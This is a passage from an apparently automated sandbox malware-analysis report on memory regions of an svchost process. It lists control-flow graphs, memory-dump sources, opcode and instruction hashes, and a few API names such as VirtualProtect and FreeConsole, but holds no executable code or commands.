1917->1916 1930 7ffb4af9d924-7ffb4af9d93c 1918->1930 1944 7ffb4af9d8fa-7ffb4af9d902 1919->1944 1927 7ffb4af9d6e4-7ffb4af9d6f3 1921->1927 1928 7ffb4af9d6f5-7ffb4af9d702 1921->1928 1922->1895 1939 7ffb4af9d68d-7ffb4af9d6a3 1922->1939 1925->1875 1941 7ffb4af9d708-7ffb4af9d70e 1927->1941 1928->1941 1930->1827 1935 7ffb4af9d93e-7ffb4af9d94e 1930->1935 1942 7ffb4af9d950-7ffb4af9d95b 1935->1942 1945 7ffb4af9dac3-7ffb4af9dac8 1937->1945 1938->1945 1952 7ffb4af9d6a6-7ffb4af9d6ab 1939->1952 1953 7ffb4af9d6a5 1939->1953 1949 7ffb4af9d743-7ffb4af9d748 1941->1949 1950 7ffb4af9d710-7ffb4af9d73d 1941->1950 1942->1920 1944->1894 1951 7ffb4af9d904-7ffb4af9d907 1944->1951 1946 7ffb4af9daca-7ffb4af9dadd 1945->1946 1947 7ffb4af9dadf-7ffb4af9dae5 1945->1947 1955 7ffb4af9daec-7ffb4af9daf3 1946->1955 1947->1955 1949->1827 1956 7ffb4af9d74e-7ffb4af9d76e 1949->1956 1950->1949 1951->1909 1958 7ffb4af9d909 1951->1958 1952->1922 1969 7ffb4af9d6ad-7ffb4af9d6b2 1952->1969 1953->1952 1966 7ffb4af9d770-7ffb4af9d77e 1956->1966 1967 7ffb4af9d782-7ffb4af9d7b2 call 7ffb4af98fe8 1956->1967 1958->1942 1963 7ffb4af9d90b 1958->1963 1961->1918 1962->1930 1968 7ffb4af9d8a5-7ffb4af9d8af 1962->1968 1963->1961 1966->1967 1973 7ffb4af9d7b7-7ffb4af9d7ba 1967->1973 1969->1903 1973->1875
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000010.00000002.1824674140.00007FFB4AF96000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF96000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_16_2_7ffb4af96000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 9d2040e16709c65b3a80ab552d29e3b8e0c26c9612272ae8b1a5e3cceb70e2cc
                                                                                                                                                                                      • Instruction ID: 4b06a56f8add8984b2fc9026fcd31b30091a068206bec9a0ea2308b22e7d8264
                                                                                                                                                                                      • Opcode Fuzzy Hash: 9d2040e16709c65b3a80ab552d29e3b8e0c26c9612272ae8b1a5e3cceb70e2cc
                                                                                                                                                                                      • Instruction Fuzzy Hash: 9E52A770A1CA098FDB68EF38D4A5A7977E9EF59341F2401BDE44EC72D2DE24AC428741
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000010.00000002.1824674140.00007FFB4AF96000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF96000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_16_2_7ffb4af96000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 7015a53f38828299e28ce78b402579dc8c717c12b50a98e0f28837290a037b08
                                                                                                                                                                                      • Instruction ID: e7d41e8f94b6473bdc5b7d952ae8a3c3c2328fe124a27b9b523810c7dde7d940
                                                                                                                                                                                      • Opcode Fuzzy Hash: 7015a53f38828299e28ce78b402579dc8c717c12b50a98e0f28837290a037b08
                                                                                                                                                                                      • Instruction Fuzzy Hash: 2BB1557091CB864FE31DDF39C4A50B1B7E6EFD5311B2486BED4CAC72E5CA28A4468781
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 405 7ffb4b07026b-7ffb4b07026d 406 7ffb4b0703b1-7ffb4b0703b7 405->406 407 7ffb4b07026e-7ffb4b07027c 405->407 410 7ffb4b0703b9-7ffb4b0703c8 406->410 409 7ffb4b070284-7ffb4b070286 407->409 411 7ffb4b0702f7-7ffb4b070306 409->411 412 7ffb4b070288-7ffb4b070289 409->412 416 7ffb4b0703c9-7ffb4b070404 410->416 415 7ffb4b070307-7ffb4b070309 411->415 413 7ffb4b07024f-7ffb4b070255 412->413 414 7ffb4b07028b 412->414 414->415 417 7ffb4b07028d 414->417 415->406 418 7ffb4b07030a-7ffb4b070348 415->418 419 7ffb4b070407-7ffb4b070427 416->419 420 7ffb4b070406 416->420 421 7ffb4b07028f-7ffb4b0702a0 417->421 422 7ffb4b0702d4 417->422 418->410 441 7ffb4b07034a-7ffb4b07034d 418->441 428 7ffb4b07045c-7ffb4b070474 419->428 429 7ffb4b070429-7ffb4b070440 419->429 420->419 430 7ffb4b0702a2-7ffb4b0702b8 421->430 431 7ffb4b070233-7ffb4b07024e 421->431 422->406 426 7ffb4b0702da-7ffb4b0702f5 422->426 426->411 433 7ffb4b0704b1-7ffb4b070500 429->433 434 7ffb4b070442-7ffb4b07045a 429->434 430->406 435 7ffb4b0702be-7ffb4b0702d1 430->435 431->413 451 7ffb4b070571-7ffb4b07057c 433->451 452 7ffb4b070502-7ffb4b070534 433->452 434->428 435->422 441->416 444 7ffb4b07034f 441->444 446 7ffb4b070351-7ffb4b07035f 444->446 447 7ffb4b070396-7ffb4b0703b0 444->447 446->447 453 7ffb4b07057f-7ffb4b070590 451->453 454 7ffb4b07057e 451->454 456 7ffb4b070592-7ffb4b070595 453->456 457 7ffb4b070597-7ffb4b0705a7 453->457 454->453 456->457 461 7ffb4b0705dc-7ffb4b0705f4 457->461 462 7ffb4b0705a9-7ffb4b0705c0 457->462 463 7ffb4b070631-7ffb4b07067a 462->463 464 7ffb4b0705c2-7ffb4b0705da 462->464 472 7ffb4b0706eb-7ffb4b0706f9 463->472 473 7ffb4b07067c-7ffb4b07067e 463->473 464->461 474 7ffb4b0706fa-7ffb4b07070c 472->474 473->474 475 7ffb4b070680-7ffb4b0706c7 473->475 476 7ffb4b07070f-7ffb4b07073c 474->476 477 7ffb4b07070e 474->477 483 7ffb4b07073e-7ffb4b070772 476->483 484 7ffb4b070786-7ffb4b07078b 476->484 477->476 487 7ffb4b070a42-7ffb4b070a56 483->487 489 7ffb4b070778-7ffb4b070781 483->489 484->487 488 7ffb4b07078c-7ffb4b07079e 484->488 495 7ffb4b070a57-7ffb4b070a71 487->495 490 7ffb4b07079f-7ffb4b0707bd 488->490 491 7ffb4b070783-7ffb4b070785 489->491 490->487 494 7ffb4b0707c3-7ffb4b0707d6 490->494 491->484 497 7ffb4b070847-7ffb4b070856 494->497 498 7ffb4b0707d8-7ffb4b0707d9 494->498 499 7ffb4b070857-7ffb4b070859 497->499 498->490 500 7ffb4b0707db 498->500 499->487 501 7ffb4b07085a-7ffb4b070872 499->501 500->499 502 7ffb4b0707dd 500->502 509 7ffb4b0708e3-7ffb4b0708f0 501->509 510 7ffb4b070874-7ffb4b070877 501->510 503 7ffb4b0707df-7ffb4b0707f0 502->503 504 7ffb4b070824 502->504 503->491 511 7ffb4b0707f2-7ffb4b070808 503->511 504->487 507 7ffb4b07082a-7ffb4b070845 504->507 507->497 514 7ffb4b0708f3 509->514 513 7ffb4b070879 510->513 510->514 511->487 515 7ffb4b07080e-7ffb4b070821 511->515 517 7ffb4b0708c0 513->517 518 7ffb4b07087b-7ffb4b0708a2 513->518 514->487 516 7ffb4b0708f9-7ffb4b07090c 514->516 515->504 525 7ffb4b07097d-7ffb4b070990 516->525 526 7ffb4b07090e-7ffb4b070912 516->526 520 7ffb4b0708c2 517->520 521 7ffb4b0708c3-7ffb4b0708e1 517->521 518->487 523 7ffb4b0708a8-7ffb4b0708be 518->523 520->521 521->509 523->487 523->517 527 7ffb4b070993 525->527 526->527 528 7ffb4b070914 526->528 527->487 530 7ffb4b070999-7ffb4b0709b5 527->530 529 7ffb4b070974-7ffb4b07097b 528->529 529->525 533 7ffb4b0709d2-7ffb4b0709e6 530->533 534 7ffb4b0709b7-7ffb4b0709cc 530->534 533->495 535 7ffb4b0709e8-7ffb4b0709ed 533->535 534->533 535->529 537 7ffb4b0709ef 535->537 537->487
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000010.00000002.1826904128.00007FFB4B070000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B070000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_16_2_7ffb4b070000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: A
                                                                                                                                                                                      • API String ID: 0-3554254475
                                                                                                                                                                                      • Opcode ID: a2f081419afba247112d5d07b1b20a29569dd75765d48daef737c4741a882ec8
                                                                                                                                                                                      • Instruction ID: 2738ccb98d6ad806fab58bc1a6335d83339ff88d597cd7c69f69825ac01d9160
                                                                                                                                                                                      • Opcode Fuzzy Hash: a2f081419afba247112d5d07b1b20a29569dd75765d48daef737c4741a882ec8
                                                                                                                                                                                      • Instruction Fuzzy Hash: 69422AB280D78A4FE755EF78C8555A4BFE0FF55301F1882FAD1C9CB2A2E9246846C781
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 629 7ffb4af9f8f0-7ffb4af9f909 631 7ffb4af9f953-7ffb4af9f97c call 7ffb4af9afc0 629->631 632 7ffb4af9f90b-7ffb4af9f936 629->632 641 7ffb4af9f97e-7ffb4af9f9bd 631->641 642 7ffb4af9f9e1-7ffb4af9fa04 631->642 633 7ffb4af9fa05-7ffb4af9fa17 632->633 634 7ffb4af9f93c-7ffb4af9f94f 632->634 639 7ffb4af9fa59-7ffb4af9fa67 633->639 640 7ffb4af9fa19-7ffb4af9fa27 633->640 634->631 644 7ffb4af9fbc3-7ffb4af9fbd9 639->644 645 7ffb4af9fa6d-7ffb4af9fa81 639->645 648 7ffb4af9fa2e-7ffb4af9fa3a 640->648 641->648 660 7ffb4af9f9bf-7ffb4af9f9c4 641->660 642->633 654 7ffb4af9fbda 644->654 655 7ffb4af9fbdb-7ffb4af9fbef 644->655 649 7ffb4af9fa84-7ffb4af9fabf call 7ffb4af9afc0 * 2 call 7ffb4af9d120 645->649 648->649 650 7ffb4af9fa3c-7ffb4af9fa43 648->650 676 7ffb4af9fad9-7ffb4af9fae4 649->676 677 7ffb4af9fac1-7ffb4af9fad7 649->677 657 7ffb4af9fa45-7ffb4af9fa56 650->657 654->655 663 7ffb4af9fbf1-7ffb4af9fc29 655->663 657->639 660->657 664 7ffb4af9f9c6-7ffb4af9f9e0 call 7ffb4af97660 660->664 666 7ffb4af9fc2b-7ffb4af9fc3d 663->666 667 7ffb4af9fc3f 663->667 671 7ffb4af9fc44-7ffb4af9fc46 666->671 667->671 674 7ffb4af9fc48-7ffb4af9fc4e 671->674 675 7ffb4af9fc5a-7ffb4af9fc8c 671->675 680 7ffb4af9fc50 674->680 681 7ffb4af9fc51-7ffb4af9fc56 674->681 689 7ffb4af9fc8e 675->689 690 7ffb4af9fc8f-7ffb4af9fcd1 675->690 684 7ffb4af9faf6 676->684 685 7ffb4af9fae6-7ffb4af9faf4 676->685 677->676 680->681 681->675 688 7ffb4af9faf8-7ffb4af9fafd 684->688 685->688 691 7ffb4af9fb20-7ffb4af9fb36 688->691 692 7ffb4af9faff-7ffb4af9fb1e 688->692 689->690 710 7ffb4af9fdb8-7ffb4af9fdbf 690->710 711 7ffb4af9fcd7-7ffb4af9fcdd 690->711 697 7ffb4af9fb38-7ffb4af9fb3e 691->697 698 7ffb4af9fb4a-7ffb4af9fb5f call 7ffb4af9db10 691->698 696 7ffb4af9fb63-7ffb4af9fb69 692->696 696->654 700 7ffb4af9fb6b-7ffb4af9fb70 696->700 702 7ffb4af9fb40 697->702 703 7ffb4af9fb41-7ffb4af9fb49 697->703 698->696 700->663 705 7ffb4af9fb72-7ffb4af9fba0 call 7ffb4af97660 call 7ffb4af972c0 700->705 702->703 703->698 705->644 721 7ffb4af9fba2-7ffb4af9fbc2 705->721 713 7ffb4af9fddc-7ffb4af9fdec 710->713 714 7ffb4af9fdc1-7ffb4af9fdce 710->714 715 7ffb4af9fce0-7ffb4af9fd0a 711->715 716 7ffb4af9fcdf 711->716 720 7ffb4af9fdf2-7ffb4af9fe03 713->720 714->713 722 7ffb4af9fdd0-7ffb4af9fdda 714->722 724 7ffb4af9fd0c 715->724 725 7ffb4af9fd0d-7ffb4af9fd4f 715->725 716->715 722->713 724->725 730 7ffb4af9fdaf-7ffb4af9fdb7 call 7ffb4af9fe04 725->730 731 7ffb4af9fd51-7ffb4af9fd57 call 7ffb4af98ff0 725->731 730->710 735 7ffb4af9fd5c-7ffb4af9fd78 731->735 737 7ffb4af9fd7a 735->737 738 7ffb4af9fd7b-7ffb4af9fdae 735->738 737->738 738->730
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000010.00000002.1824674140.00007FFB4AF96000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF96000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_16_2_7ffb4af96000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: DL_H
                                                                                                                                                                                      • API String ID: 0-160885995
                                                                                                                                                                                      • Opcode ID: 3a8114637ed6689e666525d8aac43d3cedce54e32f5fe13c8894280a528c4027
                                                                                                                                                                                      • Instruction ID: 0c8a28de0e4964d13601f0494a83baf8b82c542583878d2569389d8ebdd443b6
                                                                                                                                                                                      • Opcode Fuzzy Hash: 3a8114637ed6689e666525d8aac43d3cedce54e32f5fe13c8894280a528c4027
                                                                                                                                                                                      • Instruction Fuzzy Hash: 1B023471A0CA4A4FD759EF38C4A55B577F5EF99300B1401BEE44EC32E2DE28A846C781
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 1150 7ffb4af9303a-7ffb4af93047 1151 7ffb4af93049-7ffb4af93051 1150->1151 1152 7ffb4af93052-7ffb4af93063 1150->1152 1151->1152 1153 7ffb4af93065-7ffb4af9306d 1152->1153 1154 7ffb4af9306e-7ffb4af9311f VirtualProtect 1152->1154 1153->1154 1158 7ffb4af93127-7ffb4af9314f 1154->1158 1159 7ffb4af93121 1154->1159 1159->1158
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000010.00000002.1824674140.00007FFB4AF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF90000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_16_2_7ffb4af90000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 544645111-0
                                                                                                                                                                                      • Opcode ID: 448ff43927b38dac9217cfe6aa9a6ff4f0b4914740f1b17fd97e2d7834a1d693
                                                                                                                                                                                      • Instruction ID: 75bae4b9eb70d1aad5838978d855e595edf3a26aa72ec7593b645d173f43d636
                                                                                                                                                                                      • Opcode Fuzzy Hash: 448ff43927b38dac9217cfe6aa9a6ff4f0b4914740f1b17fd97e2d7834a1d693
                                                                                                                                                                                      • Instruction Fuzzy Hash: C141243090CB888FDB19DFA898466E9BFF4EF56321F0402AFD049C31A3CB646856C791
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 1168 7ffb4af9090d-7ffb4af9099c FreeConsole 1172 7ffb4af909a4-7ffb4af909c0 1168->1172 1173 7ffb4af9099e 1168->1173 1173->1172
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000010.00000002.1824674140.00007FFB4AF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF90000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_16_2_7ffb4af90000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ConsoleFree
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 771614528-0
                                                                                                                                                                                      • Opcode ID: 65c3eac95036275f504af04dd6febcc66399543799404af745f54b8099640256
                                                                                                                                                                                      • Instruction ID: 12b2c9df1aa45bb61b6b858e17861fb2409515955619ec32d88671fa67b1cb0f
                                                                                                                                                                                      • Opcode Fuzzy Hash: 65c3eac95036275f504af04dd6febcc66399543799404af745f54b8099640256
                                                                                                                                                                                      • Instruction Fuzzy Hash: D0219F7190CB4C8FEB68DF58D88AAEABBF0EB59310F00416ED049C3252DB71A805CB51
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 1318 7ffb4af988fa-7ffb4af9895f
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000010.00000002.1824674140.00007FFB4AF96000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF96000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_16_2_7ffb4af96000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: L_^
                                                                                                                                                                                      • API String ID: 0-925995230
                                                                                                                                                                                      • Opcode ID: 6b1f5315b743f8204b3f638dddcc391f35e34d1b5413cfc5c443ba66e7a13254
                                                                                                                                                                                      • Instruction ID: 8bcfdc068870efcce09491110d7abd65001611f7a8dfa85171e1362bd7268c33
                                                                                                                                                                                      • Opcode Fuzzy Hash: 6b1f5315b743f8204b3f638dddcc391f35e34d1b5413cfc5c443ba66e7a13254
                                                                                                                                                                                      • Instruction Fuzzy Hash: 9721F5F190D6418FD756BF38D0E51F537F4EF5532872805BAE48ACA1A3EE3894428741
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000010.00000002.1824674140.00007FFB4AF96000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF96000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_16_2_7ffb4af96000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: ac72e13453bd36c5c4c1722212e702e8debbed43bbad6311b8684cf03282291f
                                                                                                                                                                                      • Instruction ID: c1827e5c28967bde68bd176660ef8830399d45d7fc2b0bc12edc3dc496fa11fb
                                                                                                                                                                                      • Opcode Fuzzy Hash: ac72e13453bd36c5c4c1722212e702e8debbed43bbad6311b8684cf03282291f
                                                                                                                                                                                      • Instruction Fuzzy Hash: 9D224BB2E1DB464FE7A9EE38C4A557677E9EF94310B2401FED48DC72C2DD18A8068381
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000010.00000002.1824674140.00007FFB4AF96000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF96000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_16_2_7ffb4af96000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 799fd7724c43e4a415afba33cfbb85c6141ed6059e0f205cd48525ee8f2ff3b0
                                                                                                                                                                                      • Instruction ID: dbde137dc37ec493bd62951a723d2a0d0d9acccb325ba116bbc1359450e8e03a
                                                                                                                                                                                      • Opcode Fuzzy Hash: 799fd7724c43e4a415afba33cfbb85c6141ed6059e0f205cd48525ee8f2ff3b0
                                                                                                                                                                                      • Instruction Fuzzy Hash: FA1246B1A0DA8A4FF794EE38D8566E87BE1FF99310F1401F9D44DC72D2DE2868068741
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000010.00000002.1824674140.00007FFB4AF96000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF96000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_16_2_7ffb4af96000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 9e6e0e610d5ce7165d4aea74a507e384c6b6dfef7024d1a9c88a66631c7a321e
                                                                                                                                                                                      • Instruction ID: e13771f9cf10681b5a36dcafe8f9d5c6ddecd669c9a1a961414095ab104bf5e9
                                                                                                                                                                                      • Opcode Fuzzy Hash: 9e6e0e610d5ce7165d4aea74a507e384c6b6dfef7024d1a9c88a66631c7a321e
                                                                                                                                                                                      • Instruction Fuzzy Hash: C8C155B190DE068BEB5CAE38C5A15B9B7E9EF95310B2401FDD48FD74C2DD28B8468780
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000010.00000002.1824674140.00007FFB4AF96000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF96000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_16_2_7ffb4af96000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 2c2d9a21a9c149d73856391fffaa46c2d57922895c111c10c290cb42e1778fc5
                                                                                                                                                                                      • Instruction ID: f562ec1ddf72b20fe914ea8ae5c559542cf7236245836426d9d8b4518051b686
                                                                                                                                                                                      • Opcode Fuzzy Hash: 2c2d9a21a9c149d73856391fffaa46c2d57922895c111c10c290cb42e1778fc5
                                                                                                                                                                                      • Instruction Fuzzy Hash: 71D1E37190CA1A4FEB99FF38C9A0AE973B5FF54304B2405FDD41ADB1D6DE25A8068780
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000010.00000002.1824674140.00007FFB4AF96000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF96000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_16_2_7ffb4af96000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 9c3a0ef72ba4c6de6bf00b18b53add5e337337f764df9064cceb6ddbd6c4dbfb
                                                                                                                                                                                      • Instruction ID: c5749fc4d6f5d358b480290823d837fa311539c5d78ea93d6bf2cab5c1bb98d3
                                                                                                                                                                                      • Opcode Fuzzy Hash: 9c3a0ef72ba4c6de6bf00b18b53add5e337337f764df9064cceb6ddbd6c4dbfb
                                                                                                                                                                                      • Instruction Fuzzy Hash: 34C126B1A1CA4A4FF7A8EE28D4463E437D5FFA8311F2441F9D84DC76D2DD28A80A4781
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000010.00000002.1824674140.00007FFB4AF96000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF96000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_16_2_7ffb4af96000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 483a3364762c59935eca87faa5d3b0ce4fb12ab78d3bb510f5140ec9421b26fc
                                                                                                                                                                                      • Instruction ID: 84fbe11f6cd4413c71615200c9391ebe62a8d728ae0118d485fd4e78b0258f32
                                                                                                                                                                                      • Opcode Fuzzy Hash: 483a3364762c59935eca87faa5d3b0ce4fb12ab78d3bb510f5140ec9421b26fc
                                                                                                                                                                                      • Instruction Fuzzy Hash: 8FB15AB1A0DB494FE768EE38E5416B437E5EF95310F2501FAD48EC32D6DE28AC468781
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000010.00000002.1824674140.00007FFB4AF96000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF96000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_16_2_7ffb4af96000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 65833de6ab5523a686ef5871fb68ed269d739f11a02caf34c099d2bd46130029
                                                                                                                                                                                      • Instruction ID: 34ad93096f923baf465bde0283ab4ef3b8baee19a5df23a7f93676241febb73d
                                                                                                                                                                                      • Opcode Fuzzy Hash: 65833de6ab5523a686ef5871fb68ed269d739f11a02caf34c099d2bd46130029
                                                                                                                                                                                      • Instruction Fuzzy Hash: 7EB116A290E7C20FE30A6B38C8A55B57FB8DF5325171901FBD489CB1E3D81D994AC791
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000010.00000002.1824674140.00007FFB4AF96000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF96000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_16_2_7ffb4af96000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 42824e0be54d66396dd69c21dae21357a6fd1c51e108d680880b29973d5f72af
                                                                                                                                                                                      • Instruction ID: 9271995d980180c6669d4fd4ae42118bc378cf11bda4c2a67e9bb1d945bf7724
                                                                                                                                                                                      • Opcode Fuzzy Hash: 42824e0be54d66396dd69c21dae21357a6fd1c51e108d680880b29973d5f72af
                                                                                                                                                                                      • Instruction Fuzzy Hash: EBA1F1B0A0CB454FE329EE28C4D15B1B7E8EF59300B6545BDD48BC79A2DE29BC438781
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000010.00000002.1824674140.00007FFB4AF96000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF96000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_16_2_7ffb4af96000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: c5f7ab216c541b548353845da43a39347cbb53caf382bf84b2926cd37b1b971f
                                                                                                                                                                                      • Instruction ID: b2f7e8693610335c9ddcb733c0c1724b9159251a3c52dc1ab1011ed52418a3d8
                                                                                                                                                                                      • Opcode Fuzzy Hash: c5f7ab216c541b548353845da43a39347cbb53caf382bf84b2926cd37b1b971f
                                                                                                                                                                                      • Instruction Fuzzy Hash: DCA194B1D0DA8A8FDB49EF78C5A55A87BF5FF55300F6400FAD049D71E2CA28A845CB90
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
